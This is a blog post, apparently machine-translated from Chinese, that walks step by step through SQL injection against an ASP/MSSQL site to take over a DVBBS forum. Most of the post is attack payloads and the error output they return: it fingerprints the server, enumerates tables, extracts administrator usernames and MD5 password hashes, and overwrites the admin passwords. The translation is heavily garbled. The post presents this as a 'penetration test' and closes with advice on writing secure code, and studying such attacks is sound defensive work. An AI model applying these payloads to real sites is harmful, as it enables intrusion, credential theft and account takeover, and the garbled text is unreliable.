SQL injection invasion dynamic site (MSSQL)

  Editor preamble: 
  I did not test this article, but still a lot of preconditions, such as there must be other procedures, but also with the same sqlserver, have to assume that there are loopholes injection.    After all, and there is no fixed network, but because of the openness of Dongwangluntan, people familiar with its database structure, procedures and methods of operation.    In a step by step in the attack in management competence, and then gradually increase the authority, if the database is using the sa account, is even more trouble. 
  It is precisely because the assumption that these conditions, so we do not have too much tension, here is the ideal state of many of the intrusions, the program is to reduce our vulnerability to the attention of programmers each.    The station master in the use of combinations of various procedures, we should pay attention to security and the integrity of the proceedings. 
  I understand the dynamic network of more than 7.0 sp2 version have been 2-3, and the phenomenon, so we should pay attention to timely upgrades, a detailed mandate setting.    Fixed Network is not to say that bad, but he said the process open, with many people, the bug will find out a lot of software, said that the use of more and more, bug will be more.    Relatively speaking, I like their custom development process, relatively speaking will be some security. 
  Below are six boys in the fixed network is now the body of the latest version is 7.0 sp2.    It should be said that security is a very high.    Therefore, from script to break its own problems it difficult not small.    But we can from outside the “ some indirect way to get ” dynamic network. Iis asp sql2000 now the combination is more common.    And a Web site used a lot of asp script, it is inevitable not Chupi Lou.    If there are a host of a sql injection, which also hosts a dynamic network installation sql version, it can basically come to the conclusion: This is your dynamic network has.    Below a look at the examples. 
  First, the first target.    Assume that there sql injection following url: 


  http://www.loveyou.com/type.asp?id=6 test can be injected behind the increase in six months the single quotation marks. 
  Back to tips: 
  ole db provider for odbc drivers error 80040 e14 
  [] [odbc sql server driver] [sql server] did not have the string before the closing quotation marks. 

  To continue, the first detection system version: 


  http://www.loveyou.com/type.asp?id = (select @ @ version) – 
  Back to: ole db provider for odbc drivers error 80040 e07 
  [] [odbc sql server driver] [sql server] will nvarchar value sql server 2000 – 8.00.760 (x86) dec 17 2002 14:22:05 copyright (c) 1988-2003 corporation standard edition on windows nt 5.0 (build 2195 : Service pack 4) for the conversion of data types for int out when grammatical mistakes. 
  Appear to bear the latest sp4 patch. 

  Current users connect to the database: 


  http://www.loveyou.com/type.asp?id = (select user_name ())– 
  Back to: ole db provider for odbc drivers error 80040 e07 
  [] [odbc sql server driver] [sql server] will be converted to nvarchar value webuser int data type for the series occurred when grammatical mistakes. 
  Information received from our mistakes in the current database for users: webuser 

  Currently connected to the database: 


  http://www.loveyou.com/type.asp?id = (select db_name ())– 
  Back to: ole db provider for odbc drivers error 80040 e07 
  [] [odbc sql server driver] [sql server] nvarchar value of 01 city will be converted to int data type for the column when grammatical mistakes. 
  Information received from our mistakes in the current database called: 01city 
  Next test under the authority: (Note: This is because our aim is get fixed network system rather than occupied. Privileges on the database so we are not very important.) 


  http://www.loveyou.com/type.asp?id = (select is_srvrolemember (sysadmin)) – 
  Back to the wrong message.    Prompted the current record has been deleted.    It seems that authority really is not very high Ye.    To continue, 

  Normal display of information, seems to have permission to link the database is db_owner (down database owners. However, the manipulation of data is more than sufficient. 

  2. Get a database table.    Can possibly move the network exists in various forms on the current 01 city in the database. 
  First get a table: 


  http://www.loveyou.com/type.asp?id = (select top 1 name from sysobjects where xtype = u and status> 0 and name not in ())– 
  Back to: [] [odbc sql server driver] [sql server] will be converted to nvarchar value address int data type for the column when grammatical mistakes. 
  Yes, the first table out for: address 
  To continue, 

  Back to: admin second table is also out.    Followed by analogy, to: 
  , Admin ,…))– 

  Can be present in the database of all table. 
  Buyikuaier, the results of the table were good Yanshu ah. 
  address, admin, bbslink, bbsnews, board, user ……… can fool all of this is a dynamic network of the table.    Of course there are some other form, Bu Quguan it. 
  Next can be easily handled, should not Qucai field, we open our own look at the dynamic database will know.    Since a table, field names, then move on in your network does not have the right under the »    But please do not drop table ah.    Damage to the poor.    Our aim is to exercise technology, enhancing the level.    Good, we would be moving to the background network. 
  Third, access to the background, made Dongwangluntan administrator privileges. 


  First look at the background of the number of administrators: 

  Top of error: the current record has been deleted.    Note administrator less than four.    Submitted directly, 

  Normal display information, it appears that there is only one administrator, read out the names of managers, 

  Out, the administrator called the landing background: 01city 
  Administrators continue to read out the background Code: 

  Very smooth and password is: e7cc01be0e33a273 
  Md5 is encrypted before.    Is it going to break it »    But wait, do not need to break md5 password. 
  As dynamic network management background is the cookie session authentication.    Therefore, only managers in the future can only be landed into the background of management, general user is not into the background of management.    Even the background users and passwords are aware of the circumstances is the same.    So we have to make future management of users and passwords.    This is easy, he registered a forum for users to check out the management team, drawn, the outlook for the management of user: admin 

  Well, get his password: 


  http://www.loveyou.com/type.asp?id = (select userpassword from user where username = admin) – 
  To return to, admin password for the future: e7cc01be0e33a273 
  Md5 is the same.    Cookie deception can now use its prospects of landing the management.    But there are other ways? »    Do not forget it but now we have a database of Health killing power, oh.    The answers you might think, right, that is, update.    We have to submit: 
  To return to normal, should be successfully implemented, check out: 

  Return value for: 49ba59abbe56e057 
  Successfully change your password, click Help, this 16 md5 is a good operator in advance.    You have to know that its express password. 
  Then the same, we change the background of password management. User first into the background and future users the same, to: 

  Check out: 


  http://www.loveyou.com/type.asp?id = (select username from admin) – 
  Changes successful, administrators now have become the background: admin then change your password, to: 

  Check out: 


  http://www.loveyou.com/type.asp?id = (select password from admin) – 
  Changes successful, background administrator password has become: 49 ba59abbe56e057 

  Here, the fixed network has completely fall.    You can use the admin landing prospects and then use the same password into the background of the management. 
  40, summed up this way and not too difficult to achieve a dynamic network of control.    Through this goodwill penetration test, also exposed sql injection of the terrible attack.    For iis asp sql2000 virtual host, it is Fangbushengfang.    As long as there is a host on the sql injection point, the dynamic network will be facing a Miedingzhizai.    In fact, from the server and the huge site in the procedures for such a sql injection point is not difficult. One of the candidates is an old saying: a thousand miles embankment, collapse in Yixue.    So to prevent such an attack is the best way to strengthen the security of the code.    Safety is a whole, any minor error could lead to serious consequences 

Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Google
  • DZone
  • Netvouz
  • NewsVine
  • Technorati

You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

AddThis Social Bookmark Button

Tags: ,